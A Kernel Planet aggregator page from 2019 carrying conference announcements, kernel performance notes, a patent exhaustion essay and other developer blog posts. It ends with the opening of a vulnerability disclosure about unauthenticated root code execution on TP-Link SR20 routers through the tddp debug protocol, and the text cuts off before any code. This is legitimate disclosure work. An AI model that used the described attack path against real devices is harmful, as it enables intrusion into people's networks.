Kernel Planet

May 22, 2019

Linux Plumbers Conference: Additional early bird slots available for LPC 2019

The Linux Plumbers Conference (LPC) registration web site has been showing “sold out” recently because the cap on early bird registrations
was reached. We are happy to report that we have reviewed the registration numbers for this year’s conference and were able to open more early bird registration slots. Beyond that, regular registration will open July 1st. Please note that speakers and microconference runners get free passes to LPC, as do some microconference presenters, so that may be another way to attend the conference. Time is running out for new refereed-track and microconference proposals, so visit the CFP page soon. Topics for accepted microconferences are welcome as well.

LPC will be held in Lisbon, Portugal from Monday, September 9 through Wednesday, September 11.

We hope to see you there!

May 22, 2019 01:03 PM

May 20, 2019

James Morris: Linux Security Summit 2019 North America: CFP / OSS Early Bird Registration

The LSS North America 2019 CFP is currently open, and you have until May 31st to submit your proposal. (That’s the end of next week!)

If you’re planning on attending LSS NA in San Diego, note that the Early Bird registration for Open Source Summit (which we’re co-located with) ends today.

You can of course just register for LSS on its own, here.

May 20, 2019 08:56 PM

Linux Plumbers Conference: Tracing Microconference Accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the Tracing Microconference has been accepted into the 2019 Linux Plumbers Conference! Its return to Linux Plumbers shows that tracing is not finished in Linux, and there continue to be challenging problems to solve.

There’s a broad list of ways to perform Tracing in Linux. From the original mainline Linux tracer, Ftrace, to profiling tools like perf, more complex customized tracing like BPF and out-of-tree tracers like LTTng, systemtap, and Dtrace. Part of the trouble with tracing within Linux is that there is so much to choose from. Each of these have their own audience, but there is a lot of overlap. This year’s theme is to find those common areas and combine them into common utilities.

There is also a lot of new work that is happening and discussions between top maintainers will help keep everyone in sync, and provide good direction for the future.

Expected topics include:

Come and join us and not only learn but help direct the future progress of tracing inside the Linux kernel and beyond!

If you have another tracing topic idea, please send it to Steven Rostedt: rostedt@goodmis.org .

We hope to see you there!

May 20, 2019 05:37 PM

Pete Zaitcev: Google Fi

Seen an amusing blog post today on the topic of the hideous debacle that is Google Fi (on top of being a virtual network). Here's the best part though:

About a year ago I tried to get my parents to switch from AT&T to Google Fi. I even made a spreadsheet for my dad (who likes those sorts of things) about how much money he could save. He wasn’t interested. His one point was that at anytime he can go in and get help from an AT&T rep. I kept asking “Who cares? Why would you ever need that?”. Now I know. He was paying almost $60 a month premium for the opportunity to able to talk to a real person, face-to-face! I would gladly pay that now.

Respect your elders!

May 20, 2019 03:39 PM

Ted Tso: Switching to Hugo

With the demise of Google+, I’ve decided to try to resurrect my blog. Previously, I was using Wordpress, but I’ve decided that it’s just too risky from a security perspective. So I’ve decided my blog over to Hugo.

A consequence of this switch is that all of the Wordpress comments have been dropped, at least for now.

May 20, 2019 03:19 AM

May 14, 2019

Dave Airlie (blogspot): Senior Job in Red Hat graphics team

We have a job in our team, it's a pretty senior role, definitely want people with lots of experience. Great place to work,ignore any possible future mergers :-)

https://global-redhat.icims.com/jobs/68911/principal-software-engineer/job?mobile=false&width=1526&height=500&bga=true&needsRedirect=false&jan1offset=600&jun1offset=600

May 14, 2019 09:07 PM

May 10, 2019

Linux Plumbers Conference: RISC-V microconference accepted for the 2019 Linux Plumbers Conference

The open nature of the RISC-V ecosystem has allowed contributions from both academia and industry leading to an unprecedented number of new hardware design proposals in a very short time span. Linux support is the key to enabling these new hardware options. Since last year’s Plumbers, many kernel features were added to RISC-V. To name a few, we now have out-of-box 32-bit and eBPF support, some key issues with Linux boot process have been addressed, and hypervisor support is on its way.

Last year’s RISC-V microconference was such a success that we would like to repeat that again this year by focusing on finding solutions and discussing ideas that require kernel changes.

Topics for this year microconference are expected to cover:

If you’re interested in participating in this microconference or have other topics to propose, please contact Atish Patra (atish.patra@wdc.com) or Palmer Dabbelt (palmer@dabbelt.com)

LPC will be held in Lisbon, Portugal from Monday, September 9 through Wednesday, September 11.

We hope to see you there!

May 10, 2019 07:55 PM

May 09, 2019

Davidlohr Bueso: Linux v5.1: Performance Goodies

sched/wake_q: reduce atomic operations for special users

Some core users of wake_qs, futex and rwsems were incurring in double task reference counting - which was a side effect for safety reasons. This change levels the call's performance with the rest of the users.
[Commit 07879c6a3740]

irq: Speedup for interrupt statistics in /proc/stat

On large systems with a large amount of interrupts the readout of /proc/stat takes a long time to sum up the interrupt statistics.  The reason for this is that interrupt statistics are accounted per cpu. So the /proc/stat logic has to sum up the interrupt stats for each interrupt. While applications shouldn't really be doing this to a point where it creates bottlenecks, the fix was fairly easy.
[Commit 1136b0728969]

mm/swapoff: replace quadratic complexity for lineal

try_to_unuse() is of quadratic complexity, with a lot of wasted effort. It unuses swap entries one by one, potentially iterating over all the page tables for all the processes in the system for each one. With these changes, it now iterates over the system's mms once, unusing all the affected entries as it walks each set of page tables.

Improvements show time reductions for swapoff being called on a swap partition containing about 6G of data, from 8 to 3 minutes.
[Commit c5bf121e4350 b56a2d8af914]

  mm: make pinned_vm an atomic counter

This reduces some of the bulky mmap_sem games that are played when, mostly rdma, deals with the pinned pages counter. It also pivots on not relying on the lock for get user pages operations.
[Commit 70f8a3ca68d3 3a2a1e90564e b95df5e3e459]

drivers/async: NUMA aware async_schedule calls

Asynchronous function calls reduces, primarily, kernel boot time by safely doing out of order operations, such as device discovery. This series improves the NUMA locality by being able to schedule device specific init work on specific NUMA nodes in order to improve performance of memory initialization. Significant init reduction times for persistent memory were seen.
[Commit 3451a495ef24 ed88747c6c4a ef0ff68351be 8204e0c1113d 6be9238e5cb6 c37e20eaf4b2 8b9ec6b73277 af87b9a7863c 57ea974fb871]

lib/iov_iter: optimize page_copy_sane()

This avoid cacheline misses when dereferencing a struct page, via compound_head(), when possible. Apparently the overhead was visible on TCP doing recvmsg() calls dealing with GRO packets.
[Commit 6daef95b8c91]

fs/epoll: reduce lock contention in ep_poll_callback()

This patch increases the bandwidth of events which can be delivered from sources to the poller by adding poll items in a lockless way to the ready list; via clever ways of xchg() while holding a reader rwlock . This improves scenarios with multiple threads generating IO events which are delivered to a single threaded epoll_wait()er.
[Commit c141175d011f c3e320b61581 a218cc491420]

fs/nfs: reduce cost of listing huge directories (readdirplus)

When listing very large directories via NFS, clients may take a long time to complete. Most of the culprit is in various degrees of libc's readdir(2) reading 32k files at a time. To improve performance and reduce the amount of rpc calls, NFS readdirplus rpc will ask for a large data (more than 32k), the data can fill more than one page, the cached pages can be used for next readdir call. Benchmarks show rpc calls decreasing by 85% while listing a directory with 300k files.
[Commit be4c2d4723a4]

fs/pnfs: Avoid read/modify/write when it is not necessary

When testing with fio, Throughput of overwrite (both buffered and O_SYNC) is noticeably improved.
[Commit 97ae91bbf3a7 2cde04e90d5b]

May 09, 2019 08:10 PM

Davidlohr Bueso: Linux v5.0: Performance Goodies

mm/page-alloc: reduce zone->lock contention

Contention in the page allocator was seen in a network traffic report, in which order-0 allocations are being freed by back to the directly to the buddy, instead of making use of percpu-pages in the page_frag_free() call. Aside from eliminating the contention, it was seen to improve some microbenchmarks.
[Commit 65895b67ad27]

mm/mremap: improve scalability on large regions

When THP is disabled, move_page_tables() can bottleneck a large mremap() call, as it will copy each pte at a time. This patch speeds up the performance by copying at the PMD level when possible. Up to 20x speedups were seen when doing a 1Gb remap.
[Commit 2c91bd4a4e2e]

mm: improve anti-fragmentation

Given sufficient time or an adverse workload, memory gets fragmented and the long-term success of high-order allocations degrades. Overall the series reduces external fragmentation causing events by over 94% on 1 and 2 socket machines, which in turn impacts high-order allocation success rates over the long term.
[Commit 6bb154504f8b a921444382b4 0a79cdad5eb2 1c30844d2dfe]

mm/hotplug: optimize clear hw_poisoned_pages()

During hotplug remove, the kernel will loop for the respective number of pages looking for poisoned pages. Check the atomic hint in case this are none, and optimize the function.
[Commit 5eb570a8d924]

mm/ksm: Replace jhash2 with xxhash

xxhash is an extremely fast non-cryptographic hash algorithm for checksumming, making it suitable to use in kernel samepage merging. On a custom KSM benchmark, throughput was seen to improve from 1569 to 8770 MB/s.

genirq/affinity: Spread IRQs to all available NUMA nodes

If the number of NUMA nodes exceeds the number of MSI/MSI-X interrupts which are allocated for a device, the interrupt affinity spreading code fails to spread them across all nodes. NUMA nodes above the number of interrupts are all assigned to hardware queue 0 and therefore NUMA node 0, which results in bad performance and has CPU hotplug implications. Fix this by assigning via round-robin.
[Commit b82592199032]

fs/epoll: Optimizations for epoll_wait()

Various performance changes oriented towards improving the waiting side, such that contention epoll waitqueue (previously ep->lock) spinlock is reduced. This produces pretty good results for various concurrent epoll_wait(2) benchmarks.
[Commit 74bdc129850c 4e0982a00564 76699a67f304 21877e1a5b52 c5a282e9635e abc610e01c66 86c051793b4c]

lib/sbitmap: Various optimizations

Two optimizations to the sbitmap core were introduced, which is used, for example, by the block-mq tags. The first optimizes wakeup checks and adds to the core api, while the second introduces batched clearing of bits, trading 64 atomic bitops for 2 cmpxchg calls.
[Commit 5d2ee7122c73 ea86ea2cdced]

fs/locks: Avoid thundering herd wakeups

When one thread releases a lock on a given file, it wakes up all other threads that are waiting (classic thundering-herd) - one will get the lock and the others go to sleep.  The overhead starts being noticeable with increasing thread counts. These changes create a tree of pending lock request in which siblings don't conflict and each lock request does conflict with its parent. When a lock is released, only requests which don't conflict with each other a woken.

Testing shows that lock-acquisitions-per-second is now fairly stable even as number of contending process goes to 1000. Without this patch, locks-per-second drops off steeply after a few 10s of processes. Micro-benchmarks can be found per the lockscale program, which tests fcntl(..., F_OFD_SETLKW, ...) and flock(..., LOCK_EX) calls.

arm64/lib: improve crc32 performance for deep pipelines

This change replace most branches with a branchless code path that overlaps 16 byte loads to process the first (length % 32) bytes, and process the remainder using a loop that processes 32 bytes at a time.
[Commit efdb25efc764]

May 09, 2019 08:10 PM

Michael Kerrisk (manpages): man-pages-5.01 is released

I've released man-pages-5.01. The release tarball is available on kernel.org. The browsable online pages can be found on man7.org. The Git repository for man-pages is available on kernel.org.

This release resulted from patches, bug reports, reviews, and comments from just over 20 contributors. The release is smaller release than typical; it includes just over 70 commits that changed just over 40 pages.

The most notable of the changes in man-pages-5.01 is the following:


May 09, 2019 12:10 PM

May 04, 2019

Pete Zaitcev: YAML

Seen in a blog entry by Martin Tournoij (via):

I’ve been happily programming Python for over a decade, so I’m used to significant whitespace, but sometimes I’m still struggling with YAML. In Python the drawbacks and loss of clarity are contained by not having functions that are several pages long, but data or configuration files have no such natural limits to their length.

[...]

YAML may seem ‘simple’ and ‘obvious’ when glancing at a basic example, but turns out it’s not. The YAML spec is 23,449 words; for comparison, TOML is 3,339 words, JSON is 1,969 words, and XML is 20,603 words.

There's more where the above came from. In particular, the portability issues are rather surprising.

Unfortunately for me, OpenStack TripleO is based on YAML.

May 04, 2019 06:48 PM

Linux Plumbers Conference: BPF microconference accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the BPF microconference has been accepted into the 2019 Linux Plumbers Conference! Last year’s BPF microconference was such a success that it will be held again this year.

BPF along with its just-in-time (JIT) compiler inside the Linux kernel allows for versatile programmability of the kernel and plays a major role in networking (XDP, tc BPF, etc.), tracing (kprobes, uprobes, tracepoints) and security (seccomp, landlock) subsystems.

Since last year’s Plumbers Conference, many of the discussed improvements have been tackled and found their way into the Linux kernel such as significant steps towards allowing for a compile-once paradigm with the help of BTF and global data support as well as considerable verifier scalability improvements to name a few. The topics proposed for this year’s event include:

– libbpf, loader unification
– Standardized BPF ELF format
– Multi-object semantics and linker-style logic for BPF loaders
– Verifier scalability work towards 1 million instructions
– Sleepable BPF programs
– BPF loop support
– Indirect calls in BPF
– Unprivileged BPF
– BPF type format (BTF)
– BPF timers
– bpftool
– LLVM BPF backend, JITs and BPF offloading
– and more

Come join us and participate in the decision making of one of the most cutting edge advancements in the Linux kernel!

See here for a detailed preview of the proposed and accepted topics. Please feel free to submit your discussion proposals to Alexei or Daniel: lpc-bpf@vger.kernel.org

We hope to see you there!

May 04, 2019 01:31 AM

May 02, 2019

Pete Zaitcev: Fraud in the material world

Wow, they better not be building Boeings from this crap:

NASA Launch Services Program (LSP) investigators have determined the technical root cause for the Taurus XL launch failures of NASA’s Orbiting Carbon Observatory (OCO) and Glory missions in 2009 and 2011, respectively: faulty materials provided by aluminum manufacturer, Sapa Profiles (SPI). LSP’s technical investigation led to the involvement of NASA’s Office of the Inspector General and the U.S. Department of Justice (DOJ). DOJ’s efforts, recently made public, resulted in the resolution of criminal charges and alleged civil claims against SPI, and its agreement to pay $46 million to the U.S. government and other commercial customers. This relates to a 19-year scheme that included falsifying thousands of certifications for aluminum extrusions to hundreds of customers.

BTW, those costly failures probably hastened the sale of Orbital to ATK in 2015. There were repercussions for the personnell running the Taurus program as well.

May 02, 2019 05:52 PM

Daniel Vetter: Upstream First

lwn.net just featured an article the sustainability of open source, which seems to be a bit a topic in various places since a while. I’ve made a keynote at Siemens Linux Community Event 2018 last year which lends itself to a different take on all this:

The slides for those who don’t like videos.

This talk was mostly aimed at managers of engineering teams and projects with fairly little experience in shipping open source, and much less experience in shipping open source through upstream cross vendor projects like the kernel. It goes through all the usual failings and missteps and explains why an upstream first strategy is the right one, but with a twist: Instead of technical reasons, it’s all based on economical considerations of why open source is succeeding. Fundamentally it’s not about the better software, or the cheaper prize, or that the software freedoms are a good thing worth supporting.

Instead open source is eating the world because it enables a much more competitive software market. And all the best practices around open development are just to enable that highly competitive market. Instead of arguing that open source has open development and strongly favours public discussions because that results in better collaboration and better software we put on the economic lens, and private discussions become insider trading and collusions. And that’s just not considered cool in a competitive market. Similar arguments can be made with everything else going on in open source projects.

Circling back to the list of articles at the top I think it’s worth looking at the sustainability of open source as an economic issue of an extremely competitive market, in other words, as a market failure: Occasionally the result is that no one gets paid, the customers only receive a sub-par product with all costs externalized - costs like keeping up with security issues. And like with other market failures, a solution needs to be externally imposed through regulations, taxation and transfers to internalize all the costs again into the product’s prize. Frankly no idea how that would look like in practice though.

Anyway, just a thought, but good enough a reason to finally publish the recording and slides of my talk, which covers this just in passing in an offhand remark.

Update: Fix slides link.

May 02, 2019 12:00 AM

April 24, 2019

Linux Plumbers Conference: Lots of microconferences proposed for LPC

Microconference proposals have been rolling in for the 2019 Linux Plumbers Conference, but it is not too late to submit more. So far, we have the following microconference proposals:

If you have suggestions for topics to be discussed in those microconferences, please email contact@linuxplumbersconf.org to connect with the microconference runners.

Other microconference topic areas are still welcome, please go to the CFP page to submit yours today!

April 24, 2019 01:36 PM

April 13, 2019

Linux Plumbers Conference: Registration is open for the 2019 Linux Plumbers Conference

Registration is now open for the 2019 edition of the Linux Plumbers Conference (LPC). It will be held September 9-11 in Lisbon, Portugal with dedicated Linux Kernel Summit and Networking tracks, as was done last year, along with the microconferences and refereed presentations that are LPC standards. Go to the registration site to sign up or the attend page for more information on dates and quotas for the various registration types. Early registration will run until June 30 or until the quota is filled.

Note that the CFPs for microconferences, refereed track talks, and BoFs are still open, please see this page for more information.

As always, please contact the organizing committee if you have questions.

April 13, 2019 09:23 AM

April 12, 2019

Linux Plumbers Conference: Linux Plumbers Conference 2019 Call for Bird of a Feather (BoF) Session Proposals

On the heels of the previous announcements, we are also pleased to announce the Bird of a Feather (BoF) Session Proposals for the 2019 edition of the Linux Plumbers Conference, which will be held in Lisbon, Portugal on September 9-11 in conjunction with the Linux Kernel Maintainer Summit.

BoFs are free-form get-togethers for people wishing to discuss a particular topic. As always, you only need to submit proposals for BoFs you want to hold on-site. In contrast, and again as always, informal BoFs may be held at local drinking establishments or in the “hallway track” at your convenience.

For more information on submitting a BoF session proposal, see the following:

https://www.linuxplumbersconf.org/event/4/abstracts

Please note that the submission system is the same as 2018. If you created an user account last year, you will be able to re-use the same credentials to submit and modify your proposal(s) this year.

The call for Microconferences and Refereed-Track proposals are also open, and we hope to see you in Lisbon this coming September!

April 12, 2019 08:05 AM

April 10, 2019

Paul E. Mc Kenney: Confessions of a Recovering Proprietary Programmer, Part XVI

I build quite a few Linux kernels, mostly in support of my deep and abiding rcutorture habit. These builds can take some time, even on modern laptops, but they are nevertheless amazingly fast compared to the build times of the much smaller projects I worked on in decades past. Additionally, build times are way down in the noise when I am doing multi-hour rcutorture runs. So much so that I don't bother with cut-down kernel configurations, especially given that cut-down configurations are an excellent way to fail to spot subtle RCU API problems.

Still, faster builds do have their advantages, especially when doing a series of short tests, such as when chasing down that rarest of creatures, an RCU bug that reproduces reliably within a few minutes of boot. Which is exactly what I was doing yesterday. And during that time, a five-minute kernel build time was much more annoying than it normally would be.

But that is why we have ccache, a tool that is considerably more attractive than it was back when my laptop's mass storage weighed in at “only” a few tens of gigabytes. With a bit of help from here, here, and the ccache man page, I got ccache up and running, and somewhat later got it actually making kernel builds go faster. Sometimes considerably more than an order of magnitude faster!

But I do get spoiled really quickly.

You see, the first ccache build goes no faster than a normal build because the cache is initially empty. And yes, a five, six, or even seven-minute build was just fine a couple of days ago: After all, there is always some small task that needs to be done. But having just witnessed builds completing in way less than one minute, even a five-minute wait now seemed horribly slow. And a five-minute build is what I get the first time I run a given rcutorture scenario. Or after I modify an rcutorture scenario. Or if I specify unusual arguments to rcutorture's --kconfig command-line option. Or if I modify a heavily used include file. Or when I configured ccache's cache size too small.

Nevertheless, I most definitely should have installed ccache a very long time ago! :-)

April 10, 2019 09:37 PM

April 08, 2019

Linux Plumbers Conference: Results from the 2018 LPC survey

Thank you to everyone who participated in the survey after Linux Plumbers in 2018. We had 134 responses, which, given the total number of conference participants of around 492, has provided confidence in the feedback.

Overall: 85% of respondents were positive about the event, with only 2% actually saying they were dissatisfied. Co-locating with Kernel Summit proved popular, so we will be co-locating with Kernel Summit in 2019. Co-locating with Networking Summit was also well received, so we will be doing that again this year, too. Conference participation was up from 2017 and we sold out again this year. 98% of those that registered were able to attend.

Based on feedback from last year’s survey, we videotaped all of the sessions, and the videos are now posted. There are over 100 hours of video in our YouTube channel or you can access them by visiting the detailed schedule and clicking on the video link in the presentation materials section of any given talk or discussion. The Microconferences are recorded as one long video block, but clicking on the video link of a particular discussion topic will take you to the time index in that file where the chosen discussion begins.

Venue: 67% of survey respondents considered the size of attendees to be just right, however 25% would have like to have seen more able to attend. In general, 43% of respondents considered the venue size to be a good match, but a significant portion would have preferred it to be bigger (45%) as well. The room size was considered effective for participation by 95% of the respondents, however there was a clear indication in the comments that we need to figure out a better way to allocate rooms based on expected participants, as some ended up overflowing. There is some desire for additional electrical outlets to be made available, which will be looked into for the 2019 event.

Content: In terms of track feedback, Linux Plumbers Refereed track and Kernel Summit track were indicated as very relevant by almost all respondents who attended. The Networking track had fewer participants responding on the survey, but was positively reviewed as well. Hallway track continues to be regarded as very relevant, and appreciated.

Communication: This year we had a new website, and participants were able to navigate through it and find the session needed. In the feedback, there were some requests to integrate scheduling app capabilities (and attendee room size); the committee will look into options for that.

Events: Craft Beer was the most popular event and had favorable feedback from respondents. There were some concerns expressed in the written feedback that we didn’t clarify there were non-alcoholic options available there, and we’ll take note to communicate this better in future. The final closing event venue was originally planned for conference attendance similar to the prior year; the increase of 20% to 492 attendees, impacted this event, and the perception was that it was too crowded and had insufficient food from the comments.

There were lots of great suggestions to the “what one thing would you like to see changed” question, and the program committee has been studying them to see what is possible to implement this year. Thank you again to the participants for their input and help on making the Linux Plumbers Conference better in 2019 and the future.

April 08, 2019 03:30 PM

March 30, 2019

James Bottomley: A Roadmap for Eliminating Patents in Open Source

The realm of Software Patents is often considered to be a fairly new field which isn’t really influenced by anything else that goes on in the legal lansdcape. In particular there’s a very old field of patent law called exhaustion which had, up until a few years ago, never been applied to software patents. This lack of application means that exhaustion is rarely raised as a defence against infringement and thus it is regarded as an untested strategy. Van Lindberg recently did a FOSDEM presentation containing interesting ideas about how exhaustion might apply to software patents in the light of recent court decisions. The intriguing possibility this offers us is that we may be close to an enforceable court decision (at least in the US) that would render all patents in open source owned by community members exhausted and thus unenforceable. The purpose of this blog post is to explain the current landscape and how we might be able to get the necessary missing court decisions to make this hope a reality.

What is Patent Exhaustion?

Patent law is ancient, going back to Greece in around 500BC. However, every legal system has been concerned that patent holders, being an effective monopoly with the legal right to exclude others, did not abuse that monopoly position. This lead to the concept that if you used your monopoly power to profit, you should only be able to do it once for the same item so that absolute property rights couldn’t be clouded by patents. This leads to something called the exhaustion doctrine: so if Alice holds a patent on some item which she sells to Bob and Bob later sells the same item to Charlie, Alice can’t force Bob or Charlie to give her a part of their sale proceeds in exchange for her allowing Charlie to practise the patent on the item. The patent rights are said to be exhausted with the sale from Alice to Bob, so there are no patent rights left to enforce on Charlie. The exhaustion doctrine has since been expanded to any authorized transfer, even if no money changes hands (so if Alice simply gave Bob the item instead of selling it, the patent still exhausts at that transaction and Bob is still free to give or sell the item to Charlie without interference from Alice).

Of course, modern US patent rights have been around now for two centuries and in that time manufacturers have tried many ingenious schemes to get around the exhaustion doctrine profitably, all of which have so far failed in the courts, leading to quite a wealth of case law on the subject. The most interesting recent example (Lexmark v Impression) was over whether a patent holder could use their patent power to enforce any onward conditions at all for which the US Supreme Court came to the conclusive finding: they can’t and goes on to say that all patent rights in the item terminate in the first authorized transfer. That doesn’t mean no post sale conditions can be imposed, they can by contract or licence or other means, it just means post sale conditions can’t be enforced by patent actions. This is the bind for Lexmark: their sales contracts did specify that empty cartridges couldn’t be resold, so their customers violated that contract by selling the cartridges to Impression to refill and resell. However, that contract was between Lexmark and the customer not Lexmark and Impression, so absent patent remedies Lexmark has no contractual case against Impression, only against its own customers.

Can Exhaustion apply if Software isn’t actually sold?

The exhaustion doctrine actually has an almost identical equivalent for copyright called the First Sale doctrine. Back when software was being commercialized, no software distributor liked the idea that copyright in software exhausts after it is sold, so the idea of licensing instead of selling software was born, which is why you always get that end user licence agreement for software you think you bought. However, this makes all software (including open source) a very tricky for patent exhaustion because there’s no first sale to exhaust the rights.

The idea that Exhaustion didn’t have to involve an exchange of something (so became authorized transfer instead of first sale) in US law is comparatively recent, dating to a 2013 decision LifeScan v Shasta where one point won on appeal was that giving away devices did exhaust the patent. The idea that authorized transfer could extend to software downloads really dates to Cascades v Samsung in 2014.

The bottom line is that exhaustion does apply to software and downloading is an authorized transfer within the meaning of the Exhaustion Doctrine.

The Implications of Lexmark v Impression for Open Source

The precedent for Open Source is quite clear: Patents cannot be used to impose onward conditions that the copyright licence doesn’t. For instance the Open Air Interface 5G alliance public licence attempts just such a restriction in clause 3 “Grant of Patent License” where it tries to restrict the grant to being only if you use the source for “study and research” otherwise you need an additional patent licence from OAI. Lexmark v Impressions makes that clause invalid in the licence: once you obtain open source under the OAI licence, the OAI patents exhaust at that point and there are no onward patent rights left to enforce. This means that source distributed under OAI can be reused under the terms of the copyright licence (which is permissive) without any fear of patent restrictions. Now OAI can still amend its copyright licence to impose the field of use restrictions and enforce them via copyright means, it just can’t use patents to do so.

FRAND and Open Source

There have recently been several attempts to claim that FRAND patent enforcement and Open Source licensing can be compatible, or more specifically a FRAND patent pool holder like a Standards Development Organization can both produce an Open Source reference implementation and still collect patent Royalties. This looks to be wrong, however; the Supreme Court decision is clear: once a FRAND Patent pool holder distributes any code, that distribution is an authorized transfer within the meaning of the first sale doctrine and all FRAND pool patents exhaust at that point. The only way to enforce the FRAND royalty payments after this would be in the copyright licence of the code and obviously such a copyright licence, while legal, would not be remotely an Open Source licence.

Exhausting Patents By Distribution

The next question to address is could patents become exhausted simply because the holder distributed Open Source code in any form? As I said before, there is actually a case on point for this as well: Cascades v Samsung. In this case, Cascades tried to sue Samsung for violating a patent on the Dalvik JIT engine in AOSP. Cascades claimed they had licensed the patent to Google for a payment only for use in Google products. Samsung claimed exhaustion because Cascades had licensed the patent to Google and Samsung downloaded AOSP from Google. The court agreed with this and dismissed the infringement action. Case closed, right? Not so fast: it turns out Cascades raised a rather silly defence to Samsung’s claim of exhaustion, namely that the authorized transfer under the exhaustion doctrine didn’t happen until Samsung did the download from Google, so they were still entitled to enforce the Google products only restriction. As I said in the beginning courts have centuries of history with manufacturers trying to get around the exhaustion doctrine and this one crashed and burned just like all the others. However, the question remains: if Cascades had raised a better defence to the exhaustion claim, would they have prevailed?

The defence Cascades could have raised is that Samsung didn’t just download code from Google, they also copied the code they downloaded and those copies should be covered under the patent right to exclude manufacture, which didn’t exhaust with the download. To illustrate this in the Alice, Bob, Charlie chain: Alice sells an item to Bob and thus exhausts the patent so Bob can sell it on to Charlie unencumbered. However that exhaustion does not give either Bob or Charlie the right to manufacture a new copy of the item and sell it to Denise because exhaustion only applies to the same item Alice sold, not to a newly manufactured copy of that item.

The copy as new manufacture defence still seems rather vulnerable on two grounds: first because Samsung could download any number of exhausted copies from Google, so what’s the difference between them downloading ten copies and them downloading one copy and then copying it themselves nine times. Secondly, and more importantly, Cascades already had a remedy in copyright law: their patent licence to Google could have required that the AOSP copyright licence be amended not to allow copying of the source code by non-Google entities except on payment of royalties to Cascades. The fact that Cascades did not avail themselves of this remedy at the time means they’re barred from reclaiming it now via patent action.

The bottom line is that distribution exhausts all patents reading on the code you distribute is a very reasonable defence to maintain in a patent infringement lawsuit and it’s one we should be using much more often.

Exhaustion by Contribution

This is much more controversial and currently has no supporting case law. The idea is that Distribution can occur even with only incremental updates on the existing base (git pull to update code, say), so if delta updates constitute an authorized transfer under the exhaustion doctrine, then so must a patch based contribution, being a delta update from a contributor to the project, be an authorized transfer. In which case all patents which read on the project at the time of contribution must also exhaust when the contribution is made.

Even if the above doesn’t fly, it’s undeniable most contributions today are made by cloning a git tree and republishing it plus your own updates (essentially a github fork) which makes you a bona fide distributor of the whole project because it can all be downloaded from your cloned tree. Thus I think it’s reasonable to hold that all patents owned by distributors and contributors in an open source project have exhausted in that project. In other words all the arguments about the scope and extent of patent grants and patent capture in open source licences is entirely unnecessary.

Therefore, all active participants in an Open Source community ipso facto exhaust any patents on the community code as that code is redistributed.

Implications for Proprietary Software

Firstly, it’s important to note that the exhaustion arguments above have no impact on the patentability of software or the validity of software patents in general, just on their enforcement. Secondly, exhaustion is triggered by the unencumbered right to redistribute which is present in all Open Source licences. However, proprietary software doesn’t come with a right to redistribute in the copyright licence, meaning exhaustion likely doesn’t trigger for them. Thus the exhaustion arguments above have no real impact on the ability to enforce software patents in proprietary code except that one possible defence that could be raised is that the code practising the patent in the proprietary software was, in fact, legitimately obtained from an open source project under a permissive licence and thus the patent has exhausted. The solution, obviously, is that if you worry about enforceability of patents in proprietary software, always use a copyleft licence for your open source.

What about the Patent Troll Problem?

Trolls, by their nature, are not IP producing entities, thus they are not ecosystem participants. Therefore trolls, being outside the community, can pursue infringement cases unburdened by exhaustion problems. In theory, this is partially true but Trolls don’t produce anything, therefore they have to acquire their patents from someone who does. That means that if the producer from whom the troll acquired the patent was active in the community, the patent has still likely exhausted. Since the life of a patent is roughly 20 years and mass adoption of open source throughout the software industry is only really 10 years old1 there still may exist patents owned by Trolls that came from corporations before they began to be Open Source players and thus might not be exhausted.

The hope this offers for the Troll problem is that in 10 years time, all these unexhausted patents will have expired and thanks to the onward and upward adoption of open source there really will be no place for Trolls to acquire unexhausted patents to use against the software industry, so the Troll threat is time limited.

A Call to Arms: Realising the Elimination of Patents in Open Source

Your mission, should you choose to be part of this project, is to help advance the legal doctrines on patent exhaustion. In particular, if the company you work for is sued for patent infringement in any Open Source project, even by a troll, suggest they look into asserting an exhaustion based defence. Even if your company isn’t currently under threat of litigation, simply raising awareness of the option of exhaustion can help enormously.

The first case an exhaustion defence could potentially be tried is this one: Sequoia Technology is asserting a patent against LVM in the Linux kernel. However it turns out that patent 6,718,436 is actually assigned to ETRI, who merely licensed it to Sequoia for the purposes of litigation. ETRI, by the way, is a Linux Foundation member but, more importantly, in 2007 ETRI launched their own distribution of Linux called Booyo which would appear to be evidence that their own actions as a distributor of the Linux Kernel have exhaused patent 6,718,436 in Linux long before they ever licensed it to Sequoia.

If we get this right, in 10 years the Patent threat in Open Source could be history, which would be a nice little legacy to leave our children.

March 30, 2019 09:32 PM

March 29, 2019

Pete Zaitcev: Swift(stack) bragging today

On their official blog:

Over the last several months, SwiftStack has been busy helping two large autonomous vehicle customers. These data pipelines are distributed across edge (vehicle sensors) to core (data center) to cloud/multi-cloud locations, and are challenged with ingest, labeling, training, inferencing, and retaining data at scale. [...] one deployment is handling more than a petabyte of data per week, with four thousand GPU cores from NVIDIA DGX-1 servers fed with 100 GB/s of throughput from SwiftStack cluster.

I suspect the task-queue expirer could be helpful at this. Although, if you're uploading 1 PB per week, it takes about a year to fill out a cluster as big as Turkcell's.

Apparently the actual storage is provided by Cisco UCS S3260. Some of our customers use Cisco UCS to run Swift too. I always thought about Cisco as a networking company, but it's different nowadays.

March 29, 2019 03:54 AM

Daniel Vetter: X.org Elections: freedesktop.org Merger - Vote Now!

Aside from the regular board elections we also have some bylaw changes to vote on. As usual with bylaw changes, we need a supermajority of all members to agree - if you don’t vote you essentially reject it, but the board has no way of knowing.

Please see the detailed changes of the bylaws, make up your mind, and go voting on the shiny new members page.

March 29, 2019 12:00 AM

March 28, 2019

Matthew Garrett: Remote code execution as root from the local network on TP-Link SR20 routers

The TP-Link SR20[1] is a combination Zigbee/ZWave hub and router, with a touchscreen for configuration and control. Firmware binaries are available here. If you download one and run it through binwalk, one of the things you find is an executable called tddp. Running arm-linux-gnu-nm -D against it shows that it imports popen(), which is generally a bad sign - popen() passes its argument directly to the shell, so if there's any way to get user controlled input into a popen() call you're basically guaranteed victory. That flagged it as something worth looking at, but in the end what I found was far funnier.

Tddp is the TP-Link Device Debug Protocol. It runs on most TP-Link devices in one form or another, but different devices have different functionality. What is common is the protocol, which has been previously described. The interesting thing is that while version 2 of the protocol is authenticated and requires knowledge of the admin password on the router, version 1 is unauthenticated.

Dumping tddp into Ghidra makes it pretty easy to find a function that calls recvfrom(), the call that copies information from a network socket. It looks at the first byte of the packet and uses this to determine which protocol is in use, and passes the packet on to a different dispatcher depending on the protocol version. For version 1, the dispatcher just looks at the second byte of the packet and calls a different function depending on its value. 0x31 is CMD_FTEST_CONFIG, and this is where things get super fun.

Here's a cut down decompilation of the function:

int ftest_config(char *byte) {
